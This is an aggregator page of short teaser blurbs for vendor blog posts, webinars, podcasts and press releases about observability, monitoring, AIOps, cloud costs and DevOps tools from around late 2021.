How Sentry Fed the Code Observability Revolution at Shift

What happens when you have to evolve a monolithic application into a microservices architecture in order to scale a doubling Engineering staff while meeting the expectations of a growing business? Join Aaron Chu, Senior Director of Technical Operations and Karan Gupta, CTO at Shift, a modern tech company disrupting the used car industry, as they share Shift’s journey to define their Observability culture. They’ll walk through how Shift uses Sentry to ensure accountability and empower engineers to improve overall outcomes.

Tracing makes a bug easy to spot

Today, I found a bug before I noticed it. Like, it was subtle, and so I wasn’t quite sure I saw it—maybe I hadn’t hit refresh yet? Later, I looked at the trace of my function and, boom, there was a clear bug. Here’s the function with the bug. It responds to a request to /win by saving a record of the win and returning the total of my winnings so far. Can you spot the problem in the TypeScript? It’s subtle. Now here’s a trace in Honeycomb: Now do you see the bug?

How Better Collaboration and Planning Drive a Superior Digital Experience

An outstanding customer experience is one that keeps customers coming back, while spreading the word about their experience. Your applications are the heartbeat of that service delivery experience for both customers and other end users. When the experience wows, customer satisfaction grows.

On AI Adoption, IT Teams Lag Far Behind Security Teams. AIOps Can Help

Security operations teams and IT operations teams share a lot in common. They have both spent the past decade grappling with systems that grow more complex every year and figuring out ways to handle ever-larger volumes of data. They also both face pressure to identify and remediate problems as quickly as possible – ideally, in real time. And they are supposed to do it all without breaking the bank.

Introducing... Splunk for iPad!

Are you busy and on the go but still need to dig into your data and view your dashboards? We’ve got you covered — introducing… Splunk for iPad! Splunk for iPad is designed for and dedicated to what’s unique and great about the iPad, taking full advantage of its portable and interactive nature with unique dashboard annotation and note-taking features.

Immersive Tech & Metaverses: Is 'Extended Reality' the Future of Hybrid Work?

Virtual reality, augmented reality, 3D environments…no matter what you do for work, you’ve been hearing these futuristic-sounding terms for years. To the average worker, these technologies have always existed on the periphery of day-to-day life. They might make waves in the gaming industry, for example, but they’re not changing the workplace on a mass scale. Well, that’s about to change.

Getting Started with Java and InfluxDB

Time series data is becoming vital, from IoT devices’ sensors to financial processing. The data collected from these sources can help in sales forecasting and making informed decisions about marketing and financial planning. In this article, you will learn about InfluxDB, one of the most efficient time series databases currently available, and explore how to use InfluxDB with Java.

Estimating Your Cloud Costs is EASY. Do it in Just 3 Clicks.

One of our customers recently got their first bill after moving their Linux and Windows workloads to Azure. Their bill was astronomical! They struggled to answer the question, “how much will it cost?” and their initial cost assessments were vague at best. Here’s what they did.

Monitor the Azure Cosmos DB integrated cache with Datadog

Azure Cosmos DB is a fully managed NoSQL database that scales automatically with load and supports multiple APIs. This makes it easy to incorporate with your applications while removing the need to maintain your own database servers. The Cosmos DB integrated cache—which is now in public preview—is a new offering that can help reduce costs and improve performance for Azure Cosmos DB.

Website and Performance Monitoring for Edge Cases

Specific needs are compelling but also hard to plan for. Your use case may be the reason you are searching for a monitoring provider, but the ability of your provider to adapt to your edge cases will be the reason you stay. The challenge is in discerning if a provider will be able to rise to meet your needs in unknown circumstances. In monitoring, there are some uniform needs. Everyone wants to know if their site is UP so HTTP(S) checks meet use cases universally.

A successful Monitoring as a Service Case: Drilling & Mining Industry

Migrating or restructuring a SCOM environment can seem like an overwhelming, even impossible, task. For one of our customers in the mining industry, however, it went more than well, and the improvements have been exceptional. Applying our Monitoring as a Service, they could benefit from the aggregated experiences of programmers, system administrators, and DevOps engineers that our service builds on to make the migration as smooth and trouble-free as possible.

ScienceLogic's DoDIN APL Certification Journey: Watch out for Spiders & Snakes

This is the fourth and final in a series of ScienceLogic blogs on the topic of the Department of Defense Information Network (DoDIN), including what it is, what it means to be approved under DoDIN standards, why it is important to both our federal and private industry customers, and the process for being approved for listing.

The Most Impactful IT Trends of 2021

As we look back at technology in 2021 it can always be interesting to reflect on what we thought was going to be and what actually came to fruition. Reflecting, one thing that was for certain is that there was more interest in cloud than ever, but who could have realized the hype that cybersecurity would get? Today, let’s look at the technology trends that came out of 2021 to kick off a year in technology review.

AWS Outage on Dec. 7, 2021 - When Did You Know About It?

If something isn’t working as expected, your customers will want to know. How quickly did you know that AWS’s us-east-1 region was having issues? Was it from an article online? Customer requests flooding into your support queue? A tweet?? Not being able to get into a PUBG match? Or speaking of matches, were you unable to message your last Tinder connection?

Broadcom Announces Intent to Acquire AppNeta

Broadcom announced its intent to acquire privately-held AppNeta, headquartered in Boston, MA. AppNeta is a provider of SaaS-based solutions that provide enterprise IT teams with precise, end-to-end visibility into network performance from the end-user’s point of view. Combined with Broadcom Software’s DX NetOps, AppNeta'a monitoring capabilities will help enterprises and service providers to more efficiently diagnose and improve network performance for end-users, independent of what network they use to access applications.

Better Together - DX NetOps and AppNeta Enable a New Level of Network Visibility, Anywhere

Broadcom announced its intent to acquire privately-held AppNeta, headquartered in Boston, MA. AppNeta is a provider of SaaS-based solutions that provide enterprise IT teams with precise, end-to-end visibility into network performance from the end-user’s point of view. Together, DX NetOps and AppNeta deliver network visibility into any connected experience over any network.

Python JSON Log Limits: What Are They and How Can You Avoid Them?

Python JSON logging has become the standard for generating readable structured data from logs. While logging in JSON is definitely much better than using the standard logging module, it comes with its own set of challenges. As your server or application grows, the number of logs also increases exponentially. It’s difficult to go through JSON log files, even if it’s structured, due to the sheer size of logs generated.

From Julliard to Bare Metal with Zac Smith | Network AF Episode 7

On this episode of Network AF, Avi talks with Zac Smith, Bare Metal Managing Director at Equinix. Zac is a graduate of Juilliard, has started multiple networking companies, and is an Operating Board Member of Pursuit. This nonprofit program teaches and mentors underrepresented communities, creating opportunities in the tech and networking space.

Incident Review - AWS Outages Crash Major Online Services - Including Amazon

The following is an analysis of the Amazon Web Services incident on 12/07/2021. Millions of users were affected by an Amazon Web Services outage that took down major online services such as Amazon, Amazon Prime, Amazon Alexa, Venmo, Disney+, Instacart, Roku, Kindle, and multiple online gaming sites. The outage, which originated in the US-EAST-1 region on Dec. 7, 2021, is still ongoing at the time of blog publication.

Elastic Observability 7.16: Ad hoc analytics and CI/CD pipeline visibility

Elastic Observability 7.16 introduces curated data exploration views for ad hoc analysis and further extends visibility into complex and distributed systems with the general availability (GA) of dozens of prebuilt Elastic Agent data integrations, observability tooling for continuous integration and continuous delivery (CI/CD) pipelines, and a new native data source integration with Amazon Web Services (AWS) FireLens. These new features allow customers to.

Broadcom Software Announces Intent to Acquire AppNeta

As consumers, we are all intimately aware of our individual dependence on the internet. Now consider that dependency and apply it to the business-critical services that your company uses daily. Nearly overnight, companies are at the mercy of the internet, a network of public networks as nearly all employees work remotely and apps that were once hosted internally move to external SaaS providers.

AppNeta Brings Borderless Monitoring to Broadcom's NetOps Solution

It was at the turn of the millennium. I was one of the first engineers entrusted with the job of installing Network Computers, the thin client that Oracle had just introduced as an alternative to personal computers. During the process, as I described the benefits of network computing and three-tier architecture to customers, there was a palpable skepticism all around. Twenty years have passed since. Client-server gave way to three-tier architecture, and with the internet came cloud computing.

Broadcom and AppNeta: Better Together

Broadcom Software just announced the intention to acquire AppNeta, a pioneer in end-user experience over the internet. AppNeta will be integrated with DX NetOps, the network monitoring software portfolio within Broadcom’s Enterprise Software Division. The acquisition marks a key milestone in the DX NetOps vision to assure Network Observability Anywhere. AppNeta adds solutions, technologies, and people that will enable DX NetOps to deliver more value to our customers and partners.

PTC Kepware and InfluxDB: Collecting and Storing Your Automation Data

If you have worked in the automation sector for some time, it is likely you have come across or at least heard of PTC Kepware. They provide one of the largest connectivity suites for automation devices such as PLC’s easing the bridge between the OT (Operation Technology) and IT (Information Technology) world. The best part? You can store, transform and visualize this data using InfluxDB. This blog post will take you through the different ways of connecting your Kepware instance to InfluxDB.

How to Use AWS Lambda Serverless Functions with InfluxDB

For time series workloads the ability of serverless functions to scale up and down is a major advantage, especially for something like IoT devices that may have intermittent connectivity and might suddenly send data in bursts. In this type of situation, it doesn’t make sense to be paying for a server to be running 24/7 when you can use a serverless function and only pay for the compute you use.

Infrastructure Monitoring and Management: How Monitoring KPIs are Helping You to Improve the Infrastructure Management

In any enterprise, IT or otherwise, infrastructure monitoring and management are extremely crucial. A drop in performance or a failure of a machine can lead to significant delays. For that reason, there’s a constant need for eyes on the overall infrastructure to ensure smooth operations. One of the best ways to gauge the overall health of infrastructure is by monitoring key performance indicators (KPI).

The Power Of The OpsRamp Platform | Hayden Sak | OpsRamp Shorts

The OpsRamp platform helps IT operations teams monitor their cloud and on-prem infrastructure and resolve incidents with machine learning. It is digital operations for modern, digital business. Listen to Hayden Sak as he uncovers the power of the OpsRamp platform and how it helps drive visibility and control across a hybrid, multi-cloud infrastructure landscape.

Testing shift left observability with the Grafana Stack, OpenTelemetry, and k6

Development is no longer a linear journey from point A to point B. As more projects shift into a state of organic growth, user feedback and constant experimentation are increasingly becoming the norm, if not the standard for engineering. “In order to support this rapid experimentation, we’re beginning to embrace new working methods and practices,” said Vinodh Ravi, Executive Director of Platform Engineering at JPMorgan Chase.

AWS Lambda Use Cases: 6 Inspirational Examples

Since being launched in 2014, the AWS Lambda service has spread fast amongst developers and cloud architects, for it is easy to use, and there is a significant cost benefit (pay-per-use basis). AWS Lambda is an Amazon Web Services serverless deployment platform that you can use in the AWS cloud environment with basically no overhead. It will save you much time and resources using Lambda for performing code tasks for websites, applications, and services running on AWS.

The Evolution of Broadcom APM: An Interview with James Kao

I recently talked with James Kao, Head of Engineering for APM at Broadcom. James leads the global development team to deliver the AIOps and application monitoring solutions that power the world's most successful businesses. He has had a diverse background in application development and monitoring across development, product management, and solution engineering roles over the last 20 years at both large enterprises and startups such as Oracle, ClearApp, and The Middleware Company.

The 5 Key Business Benefits of AIOps

It’s easy to see why developers and IT engineers should care about AIOps, which automates tasks (like incident remediation) that they would otherwise have to perform manually. But what does the business get out of AIOps? How do AIOps-powered tools help improve business outcomes? Those questions are critical to answer for any organization considering an investment in AIOps solutions.

Performance Testing Tools: 8 to Help Find Your Bottlenecks

Performance is a vital component of user experience. Users will leave—and likely not come back—if your site is slow. If they stay, they’ll be less likely to buy from you if their experience is subpar. To add insult to injury, they’re even less likely to find your app to begin with, since Google punishes poorly-performing sites in the search results. To solve the problem of poor performance, knowledge of what impacts performance is essential.

Cloud Cost Management: A Compendium of 49 Stats, Benefits, Hard Truths, Tips, and Requirements

Cloud computing has many benefits. But there are also challenges, and cloud cost management may be one of the biggest. Here are 49 stats, benefits, and hard truths you need to know about cloud cost management, along with tips and requirements to help you take control and keep your spending in check while delivering on all the value you’re looking for.

Getting Started with the InfluxDB 2.0 API and Postman

Whether you’re using InfluxDB Cloud or InfluxDB OSS, the InfluxDB API provides a simple way to interact with your InfluxDB instance. The InfluxDB v2.0 API offers a unified approach to querying, writing data to, and assessing the health of your InfluxDB instances. Today we want to share a Postman project to help you use the API easily. Postman is “an API platform for building and using APIs”.

Percepio Wins Coveted Elektra Award for Tracealyzer for Linux

Percepio®, the leader in visual trace diagnostics for embedded systems and the Internet of Things (IoT), has been awarded the prestigious Elektra Award 2021 for its visual trace diagnostics tool Tracealyzer for Linux. Tracealyzer for Linux was voted best product in the “Design Tools and Development Software” category by the jury, ahead of developer tools from five other companies, including Cadence and Synopsys.

Get alerts on metrics that matter to you with SigNoz - SigNal 07

Welcome to SigNal 07! We sipped coffee, shipped code, fixed bugs, and made commits! The highlight of November was the alerts feature release 🔔. We also expanded our team and got our first community-led tutorial on how to monitor Ruby on Rails app with SigNoz. Let's dive in to see what humans of SigNoz have been up to in the month of November.

Dashboard Fridays: Sample PagerDuty Alerting dashboard

Adam Kinniburgh is back with another Dashboard Fridays episode, this time joined by Ashley Thompson as they showcase this example PagerDuty Alerting dashboard. This dashboard gives an overview of alerting sent to PagerDuty from any source, even external sources like Pingdom.

The Impact of AI and ML in ITSM with 10 Real World Use Cases

Artificial intelligence (AI) was highlighted as a key IT service management (ITSM) trend in 2021. IT organizations are beginning to employ various AI and machine learning techniques to enhance and improve IT service management processes. Because of the abundance of data generated by ITSM systems, applying machine learning to ITSM processes makes a lot of sense as it can provide IT professionals with a deeper understanding of their infrastructure and procedures.

How to Measure Jitter | Obkio

Jitter is one of the core network metrics that you should be measuring when monitoring your network performance. Jitter is your network's biggest enemy when using UC and real-time apps like IP telephony, video conferencing, and virtual desktop infrastructure. The most accurate way to measure Jitter is by using a Network Monitoring Software, like Obkio. For example: The amount of jitter displayed over an aggregated period of 1h is the worst median jitter of all the small 1-min periods within that hour.

4 Steps to Making Observability Real for Your Team

Without unified observability, it’s stressful not having complete visibility into your application. Plus, it contributes to risky deployments. Yet we hear that many developers have poor visibility into what powers production code. Without transparency into their apps, developers cannot see: You can try navigating tickets, permissions, and dashboards that don’t tell the right story, but there are ways to solve this problem.

Auvik Rollup & Roadmap Update - Q4 2021

Patrick Albert, VP Product Management, and Julie Forsythe, VP Engineering discussed the latest Auvik developments and handy new features in our Q4 2021 Rollup & Roadmap Update. See what's new, from Discovery Dashboard, syslog, and device information improvements to certification updates for SAML SSO admins to out-of-the-box identification support for 40 more devices, and get a sneak peek into what we're working on to improve your troubleshooting experience and product extensibility.

Nexthink Secures Series D Funding - Valuation of $1.1 Billion!

Watch now to hear Nexthink’s CEO and Co-founder Pedro Bados announce an important milestone for Nexthink: raising $180M in a Series D round and garnering a $1.1B valuation. Accelerated innovation and further customer success is on the horizon following this announcement. Find out more about what this means for Nexthink’s future and the future of Digital Employee Experience.

New feature in Loki 2.4: no more ordering constraint

A new version of Loki was released back in November, and I’m here to talk about one of its most exciting features. Loki 2.4 finally removed the requirement that all data must be ingested in timestamp-ascending order. Instead, Loki now allows out of order logs up to a configurable validity window (more to come on that). In this post, I’ll walk through what all this means and why we’re thrilled about it.

Live from AWS re:Invent - Data Drivers & Racing as a Service

Presenter: Cory Minton - IT Strategist Splunk believes that every problem has an answer in data and esports racing is no different! Join this session to see how Splunk partnered with McLaren Shadow Esports to bring critical insights to the services that matter most in SIM racing with Splunk Cloud in AWS.

Expand Kubernetes Monitoring with Telegraf Operator

Monitoring is a critical aspect of cloud computing. At any time, you need to know what’s working, what isn’t, and have the ability to respond to changes occurring in a given environment. Effective monitoring begins with the ability to collect performance data from across an ecosystem and present it in a useful way. So the easier it is to manage monitoring data across an ecosystem, the more effective those monitoring solutions are and the more efficient that ecosystem is.

New Full Page Check upgrades support end user demand for richer features

Software upgrades are typically about offering new upgrades and improvements that enhance the end user experience, offer greater efficiency, and provide a more feature-rich product. These are also some of the reasons why Uptrends has released a new version of the Full Page Check monitor, which offers lots of benefits over the previous version. The demand for more metrics has grown over time not only for how the elements load but also how the page is presented to the end users.

Tiggee LLC Announces Acquisition of PerfOps Data Suite

Tiggee LLC, parent company of DNS Made Easy and Constellix has announced the acquisition of PerfOps and its enterprise data monitoring suite. Adding PerfOps to the Tiggee family enhances the company's position in the DNS and Cloud industry and will allow Tiggee to leverage its direct knowledge and 20-plus years of experience to increase the effectiveness and value of PerfOps for the industry as a whole.

State of IT Management Survey Report 2020-21

As we continue to adapt following the pandemic, which has impact us all both personally and professionally, we take this moment to commemorate the IT veterans we've lost to the pandemic. With the pandemic drastically changing the way we do business, we have conducted a study to understand the state of IT management at the height of these radical changes and analyzed how to offer a holistic approach to changing IT management needs to prepare for the post-pandemic IT world.

7 Trends in Database DevOps & Monitoring - Download the infographic

Earlier this year, we surveyed over 5,700 global IT professionals and asked them what the most pressing challenges they faced in Database DevOps and Monitoring are. We also asked specific questions to gauge what trends we could spot in the industry and compared the responses to the last 3-5 years of data we have.

Introducing Adaptive Alerts: Detect application-level error trends

Adaptive Alerts is a new feature from Rollbar that adds to our reliable, informative and actionable alerts about unexpected issues in monitored applications and services. Adaptive Alerts uses anomaly detection to learn the standard behavior of enterprise applications, and alerts developers about atypical exception rates, reducing unwanted noise.

An Introduction to Log Analysis

If you think log files are only necessary for satisfying audit and compliance requirements, or to help software engineers debug issues during development, you’re certainly not alone. Although log files may not sound like the most engaging or valuable assets, for many organizations, they are an untapped reservoir of insights that can offer significant benefits to your business.

Why observability is the way to go w/ Georg Höllebauer (APA-Tech) | The StackPod EP #2

Welcome to the second episode of the StackPod! For the second episode, we invited Georg Höllebauer. Georg is an enterprise metrics architect at APA-Tech. APA-Tech is responsible for all IT services within the Austrian Press Agency - Austria's national and largest press agency - and other customers.

New in the Kubernetes integration for Grafana Cloud: curated dashboards, built-in alerts, and more

Back in May, we announced the Kubernetes integration to help users easily monitor and alert on core Kubernetes cluster metrics using the Grafana Agent, our lightweight observability data collector optimized for sending metric, log, and trace data to Grafana Cloud. The integration allows Grafana Cloud users to monitor and alert on Kubernetes cluster metrics. Since the original release, we’ve added new features and enhancements to help our users go even further.

Goliath Technologies Launches Multi-Cloud Monitor

Philadelphia, PA – December 2, 2021 – Goliath Technologies, a leader in end-user experience monitoring and troubleshooting software for hybrid cloud environments, announced today the release of its groundbreaking Goliath Multi-Cloud Monitor offering.

Live from AWS re:Invent - Time Travel with Splunk and AWS

Presenters: Jon LeBaugh and Robert Gustafson Time Travel is possible! Well, at least for data in Splunk. Learn how and why we use AWS Lambda, Splunk smart store, and Amazon S3 to move data into the future in the behind the scenes look at Splunk’s Boss of Ops and O11y capture the flag competition.

Live from AWS re:Invent - Metrics and Logs Sitting in a Tree, Lowering your MTT*s

We all know by now that the exponential increase in cloud complexity has required a shift in traditional monitoring. These major changes lead to major challenges. Most environments are becoming more and more difficult to predict outages and determine root cause. There is a need for both real-time monitoring and alerting as well as a way to flexibly dig into your data to determine true root cause. Introducing the hottest new couple: metrics and logs. Come see how this duo can help speed up cloud adoption, future-proof your cloud monitoring, and lower MTTD and MTTR.

Five things everyone needs to know about their AWS environment that they can't see from Cloudwatch

At Splunk we love AWS, and we love all things Cloudwatch... it's a great source of data to collect and correlate. Sometimes we get asked "Why do I need Splunk when I have Cloudwatch dashboards?" What a great question! Join this session to learn about five critical insights about your AWS environment that you'll never get using Cloudwatch alone. Behold the power of Splunk's search and analysis platform!

How to Monitor Cloud Services and Why It Matters

In this webinar, we explain how—and why—tools like traceroute, when used as part of synthetic monitoring, provide deep insight into network problems such as SaaS or cloud application slowdowns. Presented by Michael Patterson, Kentik network technologist, founder and former CEO of Plixer Watch this on-demand webinar to learn.

Network Tips to Ensure a Successful AWS Migration

Join Kentik Cloud Solutions Architect, Ted Turner, and Kentik Solutions Architect, Jim Muggli, for this on-demand webinar discussion about the network solutions needed to ensure a successful AWS migration. Watch learn how to ensure your infrastructure team can overcome the top three AWS network challenges.

Network AF, Episode 6: Cat Gurinski on mentorship and the shared languages of network engineering

In the latest episode of the Network AF podcast, your host Avi Freedman welcomes his friend and networking pro Cat Gurinski to the show. As a senior network engineer with loads of experience, Cat is most passionate about automation and troubleshooting, and especially loves to use Python and Arista’s pyeapi frameworks in her pursuits. She’s also the current chair of the NANOG Program Committee, and previously worked for companies like Best Buy, Switch and Data, and Equinix.

Announcing the GA of Splunk APM's AlwaysOn Profiling

As an update to.conf’s announcement of our continuous code profiling preview, we’re excited to share that today Splunk APM’s AlwaysOn Profiling is generally available for Java applications, included in APM with no additional cost. Here’s a quick walkthrough of the feature, and how you can get started now.

How to Deploy the Splunk OpenTelemetry Collector to Gather Kubernetes Metrics

With Kubernetes emerging as a strong choice for container orchestration for many organizations, monitoring in Kubernetes environments is essential to application performance. Kubernetes allows developers to develop applications using distributed microservices introducing new challenges not present with traditional monolithic environments. Understanding your microservices environment requires understanding how requests traverse between different layers of the stack and across multiple services.

Plugin Spotlight: Exec & Execd

Telegraf comes included with over 200+ input plugins that collect metrics and events from a comprehensive list of sources. While these plugins cover a large number of use cases, Telegraf provides another mechanism to give users the power to meet nearly any use case: the Exec and Execd input plugins. These plugins allow users to collect metrics and events from custom commands and sources determined by the user.

TL;DR InfluxDB Tech Tips - Visualizing Uptime with Flux deadman() Function in InfluxDB Dashboards

A common DevOps use case involves alerting when hosts stop reporting metrics, aka a deadman alert. This can be done using the monitor.deadman() Flux function. One can easily create a deadman (or threshold) check in the InfluxDB UI Alerts section or craft a custom task to alert as well. Check out InfluxDB’s Checks and Notifications system post for more details. It’s also possible to use the monitor.deadman() function directly in a dashboard cell.

Superfast Troubleshooting of Network User Performance Issues

In our first edition of our Work From Anywhere series, we look at the value of troubleshooting end-user hardware and application issues. Exploring the granular detail that the solution provides, we look at how understanding information around the end-users hardware can help reduce mean-time-to-resolution and increasing productivity of service/support desk teams.
Sponsored Post

Leveraging Your Integration Infrastructure

The investment your organization has made in integration infrastructure (i2) over the years was necessary as the organization and the IT infrastructure grew, but it has likely been considered a necessary evil by senior management. However now that investment can be leveraged in two important new ways.

Understand the scope of user impact with Watchdog Impact Analysis

Watchdog is Datadog’s machine learning and AI engine, which leverages algorithms like anomaly detection to automatically surface performance issues in your infrastructure and applications. Without any manual setup or configuration, Watchdog generates a feed of Alerts—on anomalies such as latency spikes, elevated error rates, and network issues in cloud providers—to help you reduce your mean time to detection.

Monitor your HCP Vault cluster with Datadog

HashiCorp Cloud Platform (HCP) provides fully managed versions of some of HashiCorp’s most popular offerings, including Vault. With Vault, users have a centralized way to secure, store, and manage access to secrets across distributed systems. HCP Vault handles the day-to-day cluster maintenance, patches, and overall system security, making it easy to deploy a cluster without needing to host or manage your own infrastructure.

Sponsored Post

Observability for Microsoft Teams; How, What, and Why?

As one of the leading enterprise collaboration software globally, Microsoft Teams helps remote workers come together and stay productive. But while IT already has tools to monitor Teams call quality metrics, the pandemic shifted the organizational landscape with all of us working remotely from home. Or at least work in a hybrid way! So what does that mean for Teams monitoring now? The shift necessitates a newer Microsoft Teams monitoring strategy approach that combines synthetics with real user monitoring (RUM) to get a complete seamless digital experience.

Sponsored Post

The 15 best DevOps tools for 2021 and beyond

The integration of Development and Operations is a powerful recent approach to software development. If you're new to DevOps practices, or looking to improve your current processes, it can be tough to know which tool is best for your team. We've put together this list to help you make an informed decision on which tools should be part of your stack. Read on to discover the 15 best DevOps tools, from automated build tools to application performance monitoring platforms.

What are Webhooks and why do they matter to SCOM?

A Webhook is an API that delivers data from applications when an action or event occurs. When an event is triggered within the source site, it is seen by the Webhook, which collects the data and sends it to the desired application or URL in the form of an HTTP request. Webhooks are also instant, triggering the delivery of data in real-time, this makes them faster and easier to implement than other methods, like polling.

Ruby on Rails Application Monitoring with AppSignal

When running and maintaining an application in a production environment, we want to feel confident about the behavior of the application and know when it isn’t working as expected. At the least, we want to track errors, monitor performance, and collect specific metrics throughout the application.

Dealing with Noisy Error Monitoring

Say you've been tasked with monitoring an application, so you set up some alerts to let you know when errors are coming in. The minutes roll by, the errors start coming... ...and they don't stop coming... Oh my, there seems to be quite a few errors coming through. Alerting on each error isn't going to help, better report on changes in the error rate instead right? Not quite. While there's no shortage of vendors that'll sell you on the benefits of error rate alerting, you need to get back to basics first.

Scout APM Announces Release of External Service Monitoring

Scout APM, a leading provider of Application Performance Monitoring (APM), announced the release of Scout External Services Monitoring for Ruby, Python, and PHP applications on December 1, 2021. Scout APM provides developers, engineers, and application administrators software performance insights by delivering key web application performance metrics.

Splunk Mobile for Private Networks

Are you working in a secure environment and want to take advantage of Splunk Mobile and Connected Experiences? Welcome to Private Spacebridge, a version of Spacebridge that you can deploy and manage in your own Kubernetes cluster. Check out this video where Joe, our SR Spacebridge engineer, explains what Private Spacebridge is all about and how it works to get you securely routing mobile traffic through your environment.

Best Practices for Cloud Logging

In our last episode, we covered how to best deploy and use Cloud Monitoring. This week, we answer the most important questions about Cloud Logging - what’s the best way to ingest logs? And how do you centralize logs and manage access? Watch this episode of Engineering for Reliability to learn some best practices for using Cloud Logging. Watch to learn how to keep your services reliable and your users happy.

Grafana 8.3 released: Recorded queries, panel suggestions, new panels, added security, and more

Grafana 8.3 is here! This is an exciting release for Grafana Labs. This release includes the new Candlestick panel, a new visualization suggestions engine, support for AWS Metrics Insights and, for our Grafana Enterprise users, recorded queries. Get 8.3 You can get started with Grafana in minutes with Grafana Cloud. Here’s a closer look at the important new features in 8.3.

Customer Journey Map Templates for Enterprises To Improve Customer Experience

Customers no longer base their loyalty on price or product, but on the experience they receive. 86% of buyers are willing to pay more for a great customer experience (according to Super Office). So, to help you get started in actioning what your customers really need, here are 8 templates that address every part of the customer journey.

The 10 top network outages of 2021

Every year the internet experiences numerous disruptions and outages, and 2021 was certainly no exception. This year we documented outages, including multiple government-directed shutdowns, as well as what might be the internet’s biggest outage in history. In this post, I run through 10 of the top outages that we covered in 2021. Needless to say, the world’s network engineers deserve a load of #HugOps in 2021.

Current State of Icinga - OSMC 2021

A couple of weeks ago the Open Source Monitoring Conference (OSMC) took place in Nuremberg, Germany. For over a decade now the OSMC provides a platform for monitoring engineers and open source vendors from the field. Icinga is part of this conference since the beginning. For us the event is a highlight every year and we take the chance to spend time with the community and give updates about our products. Like every year, our CEO Bernd summarized again the current state of Icinga.

AWS Savings Plan: All You Need to Know

Organizations using Amazon Web Services (AWS) cloud traditionally leveraged Reserved Instances (RI) to realize cost savings by committing to the use of a specific instance type and operating system within the AWS region. Nearly 2 years ago, AWS rolled out a new program called Savings Plans, which give companies a new way to reduce costs by making an advanced commitment of a one-year or three-year fixed term.

Serverless security hazards and trends to consider

Fourteen billion dollars – that’s the projected global market size for serverless, which is supposed to grow by about 26 percent annually in the next few years, according to the recent Global Serverless Architecture Market report. The fast pace of adoption of serverless is hardly surprising because the technology can save significant costs for companies. It can enable them to build and deploy software and digital products without providing and maintaining any virtual or physical servers.

Domain-Centric vs. Domain-Agnostic AIOps: What to Use When

AIOps platforms fall into two main categories: domain-centric and domain-agnostic solutions. What are the differences between domain-centric and domain-agnostic AIOps, and why should you choose one type of solution or the other? Read on for guidance on understanding the respective pros and cons of domain-centric and domain-agnostic AIOps.

Data Visualization Made Easy with ReactJS, Nivo and InfluxDB

If a picture is worth a thousand words, then a well-done data visualization is worth a million. The quality of a dashboard can make or break an application. In this tutorial, you will learn how to make high-quality data visualizations easily by using the Nivo charting library with ReactJS. You will also learn how to query data stored in InfluxDB to make your charts dynamic and versatile.

DevOps State of Mind Podcast Episode 3: DevRel and DevOps, Two Peas in a Pod

‍Joe Karlsson is a senior developer advocate at SingleStore. SingleStore has a highly scalable SQL database that delivers maximum performance for transactional and analytical workloads, all with familiar relational data structures. Joe collaborates with teams across the company to amplify developers' voices and provide support for multiple audiences. Today, we're going to talk about cross team empathy and why DevRel and DevOps work hand in hand.

5 Reasons Why Your Online Business Needs Website Monitoring

In an age where the internet and eCommerce have such a massive influence on consumers' lives, no business can afford to have an unreliable website. It is as simple as that. Unstable websites cause downtime, repel customers and result in you losing sales. That's why website monitoring is so critical. In this article, you'll learn the specific benefits of constant website monitoring and why it's vital to your business' success.

Solution Brief: Increase Data Visibility and Accelerate Attack Resolution with Exabeam and Cribl LogStream

Traditional security tools struggle to adapt to the new world of cyber threats. To keep up with the growing number of daily threats, understaffed security teams need new cloud-delivered solutions and tactics focused on generating attack resolutions, consistently and repeatedly. Enter Exabeam. Exabeam powers security teams with analytics-driven insights to uncover, investigate, and resolve threats legacy tools may miss.

7 Proven Tips for a Successful Data Center Migration

Many data center migration teams try to mitigate some of the risks and avoid unwelcome surprises through detailed planning and following best practices. However, even with these efforts, data center migrations are so complex that some things still fall through the cracks. In this eBook, we've compiled a list of proven tips based on our experiences and those of our customers when dealing with data center moves to help data center managers tackle often-overlooked challenges and see success-before, during, and after the move.